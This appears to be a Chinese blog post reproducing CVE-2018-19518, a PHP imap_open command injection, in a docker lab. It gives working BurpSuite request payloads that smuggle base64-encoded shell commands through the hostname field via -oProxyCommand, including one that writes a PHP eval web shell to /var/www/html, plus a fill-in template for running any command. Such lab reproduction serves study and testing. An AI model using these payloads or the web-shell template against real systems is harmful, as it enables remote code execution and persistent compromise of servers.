CVE-2018-19518PHP漏洞

1.启动环境

bash 复制代码
docker-compose up -d

2.访问网站

bash 复制代码
http://192.168.63.156:8080/

3.打开BurpSuite

拦截到访问请求,发送到repeater。修改请求内容

bash 复制代码
hostname=x+-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQ%3d%3d|base64%09-d|sh}&username=xxx&password=xxx

执行的命令是

bash 复制代码
echo '1234567890'>/tmp/test0001

进行base64加密后变成

bash 复制代码
ZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQ==

需要转换一下,+(%2b);TAB(%09);=(%3d)

bash 复制代码
ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQ%3d%3d

完整的请求

bash 复制代码
hostname=x+-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQ%3d%3d|base64%09-d|sh}&username=xxx&password=xxx
bash 复制代码
# 原始payload
x+-oProxyCommand=echo	echo '<?php eval($_POST[1]);' > /var/www/html/1.php|base64	-d|sh}

# base64+url编码以后
hostname=x+-oProxyCommand%3decho%09ZWNobyAnPD9waHAgZXZhbCgkX1BPU1RbMV0pOycgPiAvdmFyL3d3dy9odG1sLzEucGhw%3d|base64%09-d|sh}

# 模板
hostname=x+-oProxyCommand%3decho%09【要执行命令的base64】|base64%09-d|sh}&username=xxx&password=xxx

这个请求forward以后。

在bash中查看是否创建成功。执行下面命令进入环境bash

bash 复制代码
sudo docker exec -it e78a02c75bd8 /bin/bash

可以看到已经创建成功test0001

参考

https://www.bilibili.com/video/BV1k14y1L7Sj?spm_id_from=333.788.videopod.episodes&vd_source=4677d71876ccb847909253468ef2f55c&p=4

CVE-2018-19518 漏洞复现-CSDN博客

相关推荐
乌萨奇也要立志学C++28 分钟前
【Linux】网络基础 从零理解网络通信:局域网、跨网传输与 Socket 预备知识
linux·服务器·网络
RisunJan2 小时前
Linux命令-slabtop(实时显示内核 slab 缓存信息)
linux
蚰蜒螟5 小时前
从内核源码看Linux启动:chroot、execve与MS_MOVE的协奏曲
linux·服务器·网络
酷可达拉斯5 小时前
自动化运维-ansible配置文件与主机清单
linux·运维·自动化·ansible
影视飓风TIM5 小时前
Linux下C语言缓冲区原理 + Git版本控制
linux·c语言·git
来者皆善6 小时前
ZYNQ linux上使用 USB CDC ACM
linux·运维·服务器
Dawn-bit7 小时前
Linux磁盘分区与Swap和磁盘故障查询
linux·运维·服务器·网络·云计算
无足鸟ICT9 小时前
【RHCA+】$[]
linux·运维·服务器
运维技术小记9 小时前
国产化环境配置 VNC 远程桌面:麒麟 V10 实战
linux·运维·服务器
xiaoye-duck9 小时前
《Linux系统编程》Linux 系统多线程(八): C++ 高并发线程池全链路深度解析与从零手撕实现
linux·c++·线程池